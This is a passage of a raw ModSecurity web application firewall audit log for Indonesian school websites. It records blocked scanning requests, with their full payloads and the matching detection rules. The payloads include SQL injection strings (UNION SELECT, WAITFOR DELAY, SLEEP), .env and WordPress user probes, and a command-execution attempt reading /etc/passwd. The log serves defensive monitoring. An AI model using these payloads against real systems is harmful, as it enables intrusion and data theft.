2) Stopwatch: 1747873244044992 3241 (- - -) Stopwatch2: 1747873244044992 3241; combined=1889, p1=460, p2=1401, p3=0, p4=0, p5=28, sr=134, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83b90459-Z-- --915ae502-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdYzwAAAEs 103.236.140.4 34092 103.236.140.4 8181 --915ae502-B-- POST /ufgovbank HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163020824 --915ae502-C-- reqData= &signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest --915ae502-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --915ae502-E-- --915ae502-H-- Message: Access denied with code 403 (phase 2). Pattern match "<\\!(doctype|entity)" at ARGS:reqData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "92"] [id "212860"] [rev "4"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244046428 2446 (- - -) Stopwatch2: 1747873244046428 2446; combined=1341, p1=267, p2=1051, p3=0, p4=0, p5=22, sr=53, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --915ae502-Z-- --a9221a74-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdYzgAAAEw 103.236.140.4 34090 103.236.140.4 8181 --a9221a74-B-- GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168369730 --a9221a74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a9221a74-E-- --a9221a74-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 666666' union all select null,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),null,null,' found within MATCHED_VAR: 666666' union all select null,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),null,null,'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244046323 2879 (- - -) Stopwatch2: 1747873244046323 2879; combined=1616, p1=353, p2=1232, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9221a74-Z-- --13e7454e-A-- [22/May/2025:07:20:44 +0700] aC5t3Cektx75wRFPQyh_AAAAAMw 103.236.140.4 34058 103.236.140.4 8181 --13e7454e-B-- POST /services/operOriztion HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 517 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 160793107 --13e7454e-C-- ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))-- --13e7454e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13e7454e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')) found within MATCHED_VAR: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244045973 4098 (- - -) Stopwatch2: 1747873244045973 4098; combined=3019, p1=472, p2=2520, p3=0, p4=0, p5=26, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13e7454e-Z-- --85022b18-A-- [22/May/2025:07:20:44 +0700] aC5t3Cektx75wRFPQyh_AgAAAM8 103.236.140.4 34096 103.236.140.4 8181 --85022b18-B-- POST /mp/login/../uploadControl/uploadFile HTTP/1.0 Host: 218.95.66.214 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 218.95.66.214 X-Forwarded-Server: 218.95.66.214 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 303 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp --85022b18-C-- ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: application/octet-stream bpkzoklykx ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryoDIsCqVMmF83ptmp --85022b18-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --85022b18-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||218.95.66.214|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747873244046544 3747 (- - -) Stopwatch2: 1747873244046544 3747; combined=2461, p1=427, p2=1959, p3=24, p4=27, p5=24, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85022b18-Z-- --232e1c2e-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdY0AAAAEc 103.236.140.4 34102 103.236.140.4 8181 --232e1c2e-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method&repID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 166330401 --232e1c2e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --232e1c2e-E-- --232e1c2e-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method&repID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244047997 2750 (- - -) Stopwatch2: 1747873244047997 2750; combined=1518, p1=402, p2=1087, p3=0, p4=0, p5=28, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --232e1c2e-Z-- --e8432462-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdY0wAAAE4 103.236.140.4 34102 103.236.140.4 8181 --e8432462-B-- POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 41 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 168117890 --e8432462-C-- start=0&limit=20&filer=1;SELECT SLEEP(1)# --e8432462-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8432462-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:; ?(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load) ?[\\[(]?\\b\\w{2,}|\\bcreate function .+ returns\\b))" at ARGS:filer. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "63"] [id "211820"] [rev "4"] [msg "COMODO WAF: Detects MySQL UDF injection and other data/structure manipulation attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: ;SELECT SLEEP found within ARGS:filer: 1;SELECT SLEEP(1)"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244058133 2981 (- - -) Stopwatch2: 1747873244058133 2981; combined=1721, p1=450, p2=1244, p3=0, p4=0, p5=26, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8432462-Z-- --5c802e58-A-- [22/May/2025:07:20:44 +0700] aC5t3GfriXjg62qQwE_leAAAAI8 103.236.140.4 34116 103.236.140.4 8181 --5c802e58-B-- GET /u8qx/obr_zdybxd_check.jsp?mlid=1';waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=34DCA648490CB73AC7CD8ED3738BC883 X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 162988071 --5c802e58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5c802e58-E-- --5c802e58-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/obr_zdybxd_check.jsp?mlid=1';waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244063308 2524 (- - -) Stopwatch2: 1747873244063308 2524; combined=1383, p1=340, p2=1017, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c802e58-Z-- --c3e19d36-A-- [22/May/2025:07:20:45 +0700] aC5t3eThJmFSRJ5-OZdY1AAAAFI 103.236.140.4 34118 103.236.140.4 8181 --c3e19d36-B-- POST /ncchr/attendScript/internal/runScript HTTP/1.0 Host: 127.0.0.1 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 59 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 Accept: */* Accept-Language: en Authorization: 58e00466213416018d01d15de83b0198 Content-Type: application/x-www-form-urlencoded --c3e19d36-C-- key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual --c3e19d36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3e19d36-E-- --c3e19d36-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||127.0.0.1|F|2"] [data "Matched Data: select 1,111*111,USER found within REQUEST_URI: /ncchr/attendScript/internal/runScript"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873245040743 2965 (- - -) Stopwatch2: 1747873245040743 2965; combined=1759, p1=432, p2=1297, p3=0, p4=0, p5=30, sr=130, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3e19d36-Z-- --3ac5230c-A-- [22/May/2025:07:20:47 +0700] aC5t32friXjg62qQwE_legAAAJI 103.236.140.4 34116 103.236.140.4 8181 --3ac5230c-B-- POST /newsedit/newsplan/task/binary.do HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 166 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 168117893 --3ac5230c-C-- TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+'0:0:3';select+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1 --3ac5230c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ac5230c-E-- --3ac5230c-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /newsedit/newsplan/task/binary.do"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873247053599 3241 (- - -) Stopwatch2: 1747873247053599 3241; combined=2058, p1=397, p2=1628, p3=0, p4=0, p5=33, sr=110, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ac5230c-Z-- --b21db840-A-- [22/May/2025:07:25:59 +0700] aC5vF30O04WKE1HJ5iT_BQAAAAI 103.236.140.4 34526 103.236.140.4 8181 --b21db840-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.114 Safari/537.36 Puffin/4.5.0IT Accept-Charset: utf-8 --b21db840-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b21db840-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747873559517830 706 (- - -) Stopwatch2: 1747873559517830 706; combined=306, p1=265, p2=0, p3=0, p4=0, p5=41, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b21db840-Z-- --94c70330-A-- [22/May/2025:07:47:28 +0700] aC50IH0O04WKE1HJ5iQAEgAAABM 103.236.140.4 36184 103.236.140.4 8181 --94c70330-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.130.110.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.130.110.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --94c70330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94c70330-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747874848696600 2894 (- - -) Stopwatch2: 1747874848696600 2894; combined=1388, p1=472, p2=882, p3=0, p4=0, p5=34, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94c70330-Z-- --f4002618-A-- [22/May/2025:07:48:22 +0700] aC50VmfriXjg62qQwE_mHwAAAIA 103.236.140.4 36258 103.236.140.4 8181 --f4002618-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --f4002618-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4002618-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747874902083180 820 (- - -) Stopwatch2: 1747874902083180 820; combined=347, p1=307, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4002618-Z-- --0b7f3272-A-- [22/May/2025:07:52:47 +0700] aC51X30O04WKE1HJ5iQASAAAAA4 103.236.140.4 36606 103.236.140.4 8181 --0b7f3272-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0b7f3272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b7f3272-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747875167613496 3527 (- - -) Stopwatch2: 1747875167613496 3527; combined=1560, p1=532, p2=996, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7f3272-Z-- --096fe637-A-- [22/May/2025:08:06:57 +0700] aC54sSektx75wRFPQyiBlQAAAMM 103.236.140.4 41112 103.236.140.4 8181 --096fe637-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: sid=foo X-Varnish: 166330677 --096fe637-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --096fe637-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --096fe637-E-- --096fe637-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876017507710 2639 (- - -) Stopwatch2: 1747876017507710 2639; combined=1488, p1=358, p2=1103, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --096fe637-Z-- --65165c6c-A-- [22/May/2025:08:06:58 +0700] aC54siektx75wRFPQyiBlgAAAME 103.236.140.4 41118 103.236.140.4 8181 --65165c6c-B-- POST 